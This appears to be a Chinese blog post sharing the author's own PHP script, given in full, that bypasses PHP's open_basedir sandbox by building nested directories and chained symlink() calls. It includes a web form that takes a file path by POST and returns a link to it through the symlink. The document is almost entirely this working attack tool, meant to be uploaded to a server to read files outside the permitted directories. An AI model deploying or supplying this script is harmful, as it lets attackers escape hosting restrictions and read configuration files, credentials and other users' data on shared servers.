在了解symlink() bypass open_basedir 的原理后,自己写的代码。在kali-Linux 上测试通过,Windows在路径的处理上需要修改一下。
<?php
/*
title: bypass open_basedir
auth: eT48
blodg:http://blog.csdn.net/et48_sec
*/
header("Conten-type:text/html; charset:udf-8");
error_reporting(0);
@clearstatcache();
function randStr(){
$arr = str_split('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789');
shuffle($arr);
$arr = array_slice($arr, 0, 6);
$str = implode($arr);
return $str;
}
function delTree($dir){
$files = array_diff(scandir($dir), array('.','..'));
foreach ($files as $file) {
(is_dir("$dir/$file")) ? delTree("$dir/$file") : unlink("$dir/$file");
}
return rmdir($dir);
}
function check($filename){
}
function bypassdir($path){
$paths = explode(DIRECTORY_SEPARATOR,$path);
$cwd = getcwd();
$num = preg_match_all('/\//',$cwd);
$tempfn = randStr();
$tempdir = "";
$expstr = "";
$templink = randStr();
$explink = randStr();
$res = "";
mkdir($tempfn);
chdir($tempfn);
for($i=1; $i<count($paths); $i++){
mkdir($paths[$i]);
chdir($paths[$i]);
}
for($i=1; $i<count($paths); $i++){
chdir("..");
}
for($i=1; $i<=$num+1; $i++){
mkdir($tempfn);
chdir($tempfn);
}
$tempdir = getcwd();
for($i=1; $i<=$num+2; $i++){
chdir("..");
}
for($i=1; $i<=$num+1; $i++){
$expstr .="/..";
}
symlink($tempdir,$templink);
symlink($templink.$expstr.$path,$explink);
unlink($templink);
mkdir($templink);
delTree($tempfn);
$res = "<a target='_blank' href='./".$explink."'>".$path."</a><br>";
return $res;
}
$res= "";
if(!empty($_POST['path'])){
$path = $_POST['path'];
$res = bypassdir($path);
echo $res;
die();
}
?>
<html>
<head><title>open_basedir</title></head>
<body>
Titile: bypass open_basedir<br>Auth: eT48<br> Blog: http://blog.csdn.net/et48_sec<br>Open_basedir: <?php echo ini_get('open_basedir'); ?><br>PHPVersion: <?php echo "PHP ".phpversion();?><br><br>
<form method='post'>path <input id='path' type='text' style='width:450px'><input type='button' οnclick='bypassdir()' value='submit' ></form>
<div id='output'></div>
<script src="http://www.w3school.com.cn/jquery/jquery-1.11.1.min.js"></script>
<script>
var targeturl = '<?php $_SERVER["REQUEST_URI"] ?>';
function send_post(targetdata,callback){
$.ajax({url:targeturl,type:'POST',data:targetdata,dataType:'text',success:function(res){callback(res);},error:function(){}}
)}
function bypassdir(){ path = $('#path').val(); if( path!=''){ send_post({ path:path},function(res){ $('#output').append(res);})}
}
</script>
</body>
</html>
<?php die();?>